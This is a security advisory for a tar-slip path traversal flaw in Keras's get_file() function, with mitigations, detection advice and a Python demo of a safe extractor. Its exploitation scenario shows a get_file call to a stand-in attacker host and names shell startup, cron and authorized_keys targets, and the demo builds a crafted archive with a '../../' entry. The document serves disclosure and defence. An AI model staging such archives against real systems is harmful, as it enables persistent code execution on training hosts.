CVE-2024-55459: Keras: path traversal enables arbitrary file write
GHSA-cjgq-5qmw-rcj6 | Severity: MEDIUM | PoC available | CISA SSVC: Track
Any ML pipeline that uses Keras's get_file() to download and extract external archives is exposed to arbitrary file writes on the host via a crafted tar file (tar-slip). No official patch was available at the time of writing: audit every get_file() call, restrict downloads to integrity-verified sources, and isolate training environments. Teams running Keras 3.7.0 or earlier in automated MLOps pipelines should treat this as an active supply-chain risk to training infrastructure.
Risk Assessment
Medium severity in isolation, but elevated in AI/ML contexts where automated pipelines routinely download datasets and model weights from external sources without manual review. Exploitation is low complexity once a malicious archive is staged (classic tar-slip), but it requires the victim, a person or an automated job, to fetch the archive from an attacker-controlled or compromised URL with extraction enabled. No active exploitation observed (EPSS 0.00149), not in CISA KEV. Risk concentrates in developer workstations and CI/CD training pipelines; production inference endpoints are typically not affected unless they dynamically download artifacts.
Recommended Action
1. PATCH: No official fix was available at the time of writing; monitor https://github.com/keras-team/keras for a release that sanitizes extraction paths. Because the advisory range covers 3.7.0 and earlier, pinning to an older release is not a mitigation; until a fix ships, apply the workaround below or fork with manual path sanitization.
2. WORKAROUND: Stop passing extract=True (or the legacy untar=True) to get_file(). Download only, then extract with logic that resolves every archive member against the destination directory and rejects absolute paths, any '..' component, and symlinks or hard links that point outside it. On Python 3.12+ (and the backports in 3.8.17, 3.9.17, 3.10.12 and 3.11.4) tarfile's extractall(path, filter="data") performs these checks and raises on traversal.
3. HARDEN: Execute training jobs in isolated containers without host volume mounts; apply least-privilege filesystem permissions so the job can write only to its data and model directories.
4. VERIFY: Enforce SHA-256 checksum validation for all downloaded archives before extraction and reject archives without a verified hash. get_file() supports this natively via file_hash=... with hash_algorithm="sha256". Note that a pinned hash defends against a swapped or tampered download, not against an upstream archive that was malicious when the hash was recorded, so it complements path validation rather than replacing it.
5. DETECT: Monitor for unexpected file writes outside designated data/model directories during training runs (auditd or eBPF-based tools), with particular attention to shell startup files, ~/.ssh/authorized_keys and cron directories.
6. AUDIT: Search the codebase for all keras.utils.get_file() invocations (including the tf.keras.utils.get_file alias); flag any that accept user-supplied or externally sourced URLs, or that set extract=True.
CISA SSVC Assessment
Decision: Track. Source: CISA Vulnrichment (SSVC v2.0), based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2024-55459?
A path traversal (tar-slip) in keras.utils.get_file(): when the function is asked to extract a downloaded archive, entries whose names contain '../' or absolute paths are written outside the cache directory, giving whoever controls the archive an arbitrary file write on the host. The advisory covers Keras 3.7.0 and earlier, and no official patch was available at the time of writing.
Is CVE-2024-55459 actively exploited?
No active exploitation has been observed (EPSS 0.00149, not in CISA KEV), but proof-of-concept exploit code is publicly available for CVE-2024-55459, which lowers the effort required to weaponize it.
How to fix CVE-2024-55459?
Follow the six steps under Recommended Action above: monitor for an official release (no patch at the time of writing), replace extracting get_file() calls with download-only plus a path-validating extractor, run training in isolated containers, pin SHA-256 hashes for every archive, monitor for writes outside data/model directories, and audit every get_file() invocation for externally sourced URLs.
What systems are affected by CVE-2024-55459?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, MLOps CI/CD pipelines, developer workstations.
What is the CVSS score for CVE-2024-55459?
CVE-2024-55459 has a CVSS v3.1 base score of 6.5 (MEDIUM). The EPSS exploitation probability is 0.15%.
Technical Details
NVD Description
An issue in keras 3.7.0 allows attackers to write arbitrary files to the user's machine via downloading a crafted tar file through the get_file function.
Exploitation Scenario
An adversary crafts a malicious tar.gz archive whose member names embed path traversal sequences (e.g., ../../home/mluser/.bashrc or ../../../../etc/cron.d/gpu-job). The archive is hosted on an attacker-controlled server or injected into a compromised public dataset mirror. A data scientist or automated MLOps pipeline calls keras.utils.get_file(origin='https://attacker-controlled-mirror.com/imagenet-subset.tar.gz', extract=True). Keras downloads and extracts the archive without sanitizing entry paths, silently writing attacker-controlled content to arbitrary filesystem locations the process can write to. Depending on permissions, this overwrites shell or Python startup scripts, authorized_keys, or cron entries, yielding persistent code execution on the ML training host with no further user interaction beyond the original download.
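The scenario above and the Workaround and Verify steps, worked through as an added example (not Keras project code and not from the original advisory): it builds a constructed archive carrying a '../../' member like the one described, shows the path check that flags that member, and runs a hash-pinned extractor that refuses it while accepting a benign archive. The helper names (build_tar, escaping_members, safe_extract, demo) are hypothetical; the only Keras-specific assumption is that get_file(origin=..., extract=False) returns the local path of the downloaded archive.

```python
"""Tar-slip demo: a crafted dataset archive and an extractor that refuses it.

Added example for this advisory, not Keras code. Archive contents, file names
and the hash pins below are constructed for the demo.
"""
import hashlib
import io
import os
import tarfile
import tempfile
from typing import Dict, List, Optional

# Constructed sample archives. The second carries the traversal entry from the
# exploitation scenario: it would land two directories above the target.
BENIGN_MEMBERS: Dict[str, bytes] = {
    "imagenet-subset/labels.txt": b"n01440764 tench\n",
}
MALICIOUS_MEMBERS: Dict[str, bytes] = {
    **BENIGN_MEMBERS,
    "../../escaped.txt": b"attacker-controlled content\n",
}


def build_tar(members: Dict[str, bytes]) -> bytes:
    """Write a name -> payload map into an in-memory .tar.gz (any name is accepted)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, payload in members.items():
            info = tarfile.TarInfo(name)  # TarInfo does not reject '../' names
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


class UnsafeArchive(ValueError):
    """Raised when an archive fails hash or path validation."""


def _inside(base: str, candidate: str) -> bool:
    """True if candidate resolves to base or somewhere below it."""
    base, candidate = os.path.realpath(base), os.path.realpath(candidate)
    try:
        return os.path.commonpath([base, candidate]) == base
    except ValueError:  # different drives on Windows
        return False


def escaping_members(data: bytes, dest: str) -> List[str]:
    """Names of members (or link targets) that would resolve outside dest."""
    bad: List[str] = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for m in tar.getmembers():
            target = os.path.join(dest, m.name)
            if os.path.isabs(m.name) or not _inside(dest, target):
                bad.append(m.name)
                continue
            if m.issym() or m.islnk():
                # A link pointing outside dest lets a later member write through it.
                base = os.path.dirname(target) if m.issym() else dest
                link = os.path.join(base, m.linkname)
                if os.path.isabs(m.linkname) or not _inside(dest, link):
                    bad.append(m.name)
    return bad


def safe_extract(data: bytes, dest: str, expected_sha256: Optional[str] = None) -> List[str]:
    """Verify the archive hash, reject path traversal, then extract into dest."""
    if expected_sha256 is not None:
        actual = hashlib.sha256(data).hexdigest()
        if actual != expected_sha256:
            raise UnsafeArchive(f"sha256 mismatch: got {actual}")
    bad = escaping_members(data, dest)
    if bad:
        raise UnsafeArchive(f"archive entries escape {dest!r}: {bad}")
    os.makedirs(dest, exist_ok=True)
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        # Python 3.12+ (and the backports) ship tarfile.data_filter, which also
        # drops setuid bits and device nodes; use it when present as a second layer.
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(dest, **kwargs)
        return [m.name for m in tar.getmembers() if m.isfile()]


def demo() -> Dict[str, object]:
    """Run both constructed archives through the checks in a throwaway directory."""
    benign, malicious = build_tar(BENIGN_MEMBERS), build_tar(MALICIOUS_MEMBERS)
    results: Dict[str, object] = {}
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "datasets")
        results["escaping"] = escaping_members(malicious, dest)
        try:
            safe_extract(malicious, dest)
            results["malicious_rejected"] = False
        except UnsafeArchive:
            results["malicious_rejected"] = True
        try:
            safe_extract(benign, dest, expected_sha256="00" * 32)  # deliberately wrong pin
            results["bad_hash_rejected"] = False
        except UnsafeArchive:
            results["bad_hash_rejected"] = True
        results["benign_files"] = safe_extract(
            benign, dest, expected_sha256=hashlib.sha256(benign).hexdigest())
    return results


if __name__ == "__main__":
    print(demo())
```

To use this with Keras until a fixed release is available, download without extracting and hand the file to the extractor: path = get_file(origin=URL, extract=False, file_hash=PIN, hash_algorithm="sha256"), then safe_extract(open(path, "rb").read(), dest). The realpath-based check validates each member before anything is written, so a single bad entry rejects the whole archive rather than leaving a half-extracted dataset behind.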
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N (network-reachable, low complexity, no privileges, user interaction required; integrity impact high, no confidentiality or availability impact)
References
- github.com/keras-team/keras (product)
- keras.io (product)
- river-bicycle-f1e.notion.site/Arbitrary-File-Write-Vulnerability-in-get_file-function-11888e31952580179224e50892976d32 (broken link)
- github.com/advisories/GHSA-cjgq-5qmw-rcj6
- github.com/keras-team/keras/blob/8f5592bcb61ff48c96560c8923e482db1076b54a/keras/src/utils/file_utils.py
- nvd.nist.gov/vuln/detail/CVE-2024-55459
- github.com/Organica-Ai-Solutions/NIS_Protocol (listed as exploit)
- github.com/PaperAnalyticalDeviceND/pad-analytics (listed as exploit)
Related Vulnerabilities
- CVE-2025-1550 (9.8) Keras: safe_mode bypass enables RCE via model loading [same package: keras]
- CVE-2025-49655 (9.8) keras: Deserialization enables RCE [same package: keras]
- CVE-2024-3660 (9.8) Keras: RCE via malicious model deserialization [same package: keras]
- CVE-2024-49326 (9.8) Affiliator WP Plugin: Unauthenticated Web Shell Upload
- CVE-2025-12060 (9.8) keras: Path Traversal enables file access [same package: keras]